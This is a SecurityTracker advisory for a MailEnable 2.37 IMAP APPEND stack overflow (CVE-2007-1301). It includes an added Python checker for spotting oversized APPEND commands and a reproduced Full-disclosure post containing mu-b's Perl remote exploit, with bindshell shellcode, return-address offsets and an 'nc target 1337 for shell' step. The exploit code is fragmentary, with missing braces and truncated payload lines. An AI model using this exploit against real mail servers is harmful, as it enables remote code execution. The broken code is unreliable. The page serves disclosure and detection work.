


Category:   Application (E-mail Server)  >   MailEnable
Vendors:   MailEnable Pty. Ltd.
MailEnable Buffer Overflow in IMAP APPEND Command Lets Remote Authenticated Users Execute Arbitrary Code
SecurityTracker Alert ID:  1017739
SecurityTracker URL:
CVE Reference:   CVE-2007-1301
Updated:  May 18 2008
Original Entry Date:  Mar 8 2007
Impact:   Denial of service via network, Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 2.37 and prior versions
Description:   A vulnerability was reported in MailEnable. A remote authenticated user can execute arbitrary code on the target system.

A remote authenticated user can send a specially crafted IMAP APPEND command to trigger a buffer overflow and cause the target IMAP service to crash or potentially execute arbitrary code.
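The advisory describes the trigger only at the level of "a specially crafted APPEND command". For a defender watching IMAP traffic or server command logs, the actionable point is that a well-formed APPEND carries a short mailbox name and a literal size field of the form {digits} (or {digits+} with LITERAL+), so an APPEND whose mailbox argument is far longer than any real folder name, or whose literal field is not a number at all, is the anomaly worth alerting on. The following checker is an added example written for this page; it is not SecurityTracker's, mu-b's or MailEnable's code. The 128-byte mailbox threshold and the sample session lines are constructed for illustration; the advisory gives no buffer size.

```python
"""Flag IMAP APPEND commands with oversized or malformed arguments.

Added example for this advisory page, not vendor or reporter code.
Input is one client command line per string, e.g. from a protocol log.
"""
import re
from typing import List, Optional, Tuple

# Assumed threshold for illustration only; the advisory states no buffer size
# and this figure is not taken from MailEnable or SecurityTracker.
MAX_MAILBOX_LEN = 128

# "<tag> <COMMAND> [arguments]" as sent by an IMAP client
_CMD_RE = re.compile(r'^(?P<tag>\S+)\s+(?P<cmd>[A-Za-z]+)(?:\s+(?P<args>.*))?$', re.S)
# Legal literal size field: {310} or {310+} (RFC 3501 / RFC 2088 LITERAL+)
_LITERAL_SIZE_RE = re.compile(r'\d+\+?')


def split_mailbox(args: str) -> Tuple[str, str]:
    """Split an APPEND argument string into (mailbox, remainder).

    The mailbox is either a quoted string (backslash escapes honoured) or an
    atom that ends at the first whitespace.
    """
    if args.startswith('"'):
        out, i = [], 1
        while i < len(args):
            ch = args[i]
            if ch == '\\' and i + 1 < len(args):
                out.append(args[i + 1])
                i += 2
                continue
            if ch == '"':
                return ''.join(out), args[i + 1:]
            out.append(ch)
            i += 1
        return ''.join(out), ''  # unterminated quoted string: nothing follows
    parts = args.split(None, 1)
    if not parts:
        return '', ''
    return parts[0], (parts[1] if len(parts) > 1 else '')


def check_append(line: str, max_mailbox_len: int = MAX_MAILBOX_LEN) -> Optional[dict]:
    """Return a finding for a suspicious APPEND line, or None for anything else."""
    m = _CMD_RE.match(line.rstrip('\r\n'))
    if not m or m.group('cmd').upper() != 'APPEND':
        return None
    mailbox, rest = split_mailbox(m.group('args') or '')
    reasons: List[str] = []
    if len(mailbox) > max_mailbox_len:
        reasons.append(f'mailbox argument {len(mailbox)} bytes exceeds {max_mailbox_len}')
    # The literal size field starts at the first '{' after the mailbox. A real
    # client sends {digits}; anything else (no closing brace, non-digits) is
    # not a size at all and is treated as a malformed field.
    brace = rest.find('{')
    if brace >= 0:
        body = rest[brace + 1:]
        close = body.find('}')
        size_field = body[:close] if close >= 0 else body
        if close < 0 or not _LITERAL_SIZE_RE.fullmatch(size_field):
            reasons.append(f'malformed literal size field ({len(size_field)} bytes)')
    if not reasons:
        return None
    return {'tag': m.group('tag'), 'reasons': reasons}


def scan_session(lines) -> List[dict]:
    """Run check_append over every line and collect the findings."""
    return [f for f in (check_append(l) for l in lines) if f is not None]


# Constructed sample client lines (not a real capture): one benign APPEND,
# one with an absurdly long mailbox name, one with a non-numeric literal field.
SAMPLE_SESSION = [
    '1 LOGIN alice secret',
    '2 APPEND "INBOX.Sent" (\\Seen) {310}',
    '3 APPEND "' + 'A' * 600 + '" {42}',
    '4 APPEND "()"{' + 'A' * 136,
    '5 LOGOUT',
]

if __name__ == '__main__':
    for finding in scan_session(SAMPLE_SESSION):
        print(finding)
```

The checker deliberately accepts a literal with or without a space before the brace, since the point is to catch what a parser would be handed rather than to enforce RFC grammar; tune MAX_MAILBOX_LEN to the longest folder path your users actually create before deploying it as an alert.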

mu-b at reported this vulnerability.

Impact:   A remote authenticated user can execute arbitrary code on the target system.
Solution:   The vendor has issued a fixed version (ME-10029), available at:

The MailEnable advisory is available at:

Vendor URL:
Cause:   Boundary error
Underlying OS:  Windows (NT), Windows (2000), Windows (2003), Windows (XP)

Message History:   None.

Source Message Contents

Subject:  [Full-disclosure] MailEnable v2.37 APPEND exploit


Attached is another exploit for the MailEnable Pro/Ent <= 2.37 (including the
latest). The vulnerability is a bog-standard stack based overflow in the
call at offset 0x00417CD6 (MEIMAPS.exe, v2.37).


Content-Type: text/x-perl;
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;

# Mail Enable Professional/Enterprise v2.32-4 (win32) remote exploit
# by mu-b - Wed Nov 29 2006
# - Tested on: Mail Enable Professional v2.32 (win32) - with HOTFIX
#              Mail Enable Professional v2.33 (win32)
#              Mail Enable Professional v2.35 (win32)
#              Mail Enable Professional v2.37 (win32)

use Getopt::Std; getopts('t:n:u:p:', \%arg);
use Socket;

# Fixed metasploit win32 bindshell port 1337
my $zshell_win32_bind =
  "\x81\xc4\xd0\xfd\xff\xff". # add %esp, -560

# ff e4 -> jmp %esp
my @offsets = ( "\x63\x37\x57\x7c", # Win2K Server SP4 KERNEL32.dll
                "\xef\xbe\xad\xde"  # DoS


my $target;
my $offset;
my $user;
my $passwd;

if (defined($arg{'t'})) { $target = $arg{'t'} }
if (defined($arg{'n'})) { $offset = $arg{'n'} }
if (defined($arg{'u'})) { $user = $arg{'u'} }
if (defined($arg{'p'})) { $passwd = $arg{'p'} }
if (!(defined($target)) || !(defined($user)) || !(defined($passwd))) { &usage; }
if (!(defined($offset))) { $offset = 0; }
if ($offset > $#offsets) {
    print("only ".($#offsets+1)." targets known!!\n");
} else {
    $offset = $offsets[$offset];

my $imapd_port = 143;
my $send_delay = 2;

my $NOP = 'A';

if (connect_host($target, $imapd_port)) {
    print("-> * Connected\n");
    send(SOCKET, "1 LOGIN ".$user." ".$passwd."\r\n", 0);

    print("-> * Sending payload\n");
    $buf = "2 APPEND \"()\"\{".
           ($NOP x 128).
           ($NOP x 8 ).
    send(SOCKET, $buf, 0);

    print("-> * Successfully sent payload!\n");
    print("-> * nc ".$target." 1337 for shell...\n");

sub print_header {
    print("MailEnable Pro v2.32-7 remote exploit\n");
    print("by: <mu-b\>\n\n");

sub usage {
  print(qq(Usage: $0 -t <hostname>

     -t <hostname>    : hostname to test
     -n <num>         : return addy offset number
     -u <username>    : username for login
     -p <password>    : usernames password


sub connect_host {
    ($target, $port) = @_;
    $iaddr  = inet_aton($target)                 || die("Error: $!\n");
    $paddr  = sockaddr_in($port, $iaddr)         || die("Error: $!\n");
    $proto  = getprotobyname('tcp')              || die("Error: $!\n");

    socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
    connect(SOCKET, $paddr)                      || die("Error: $!\n");


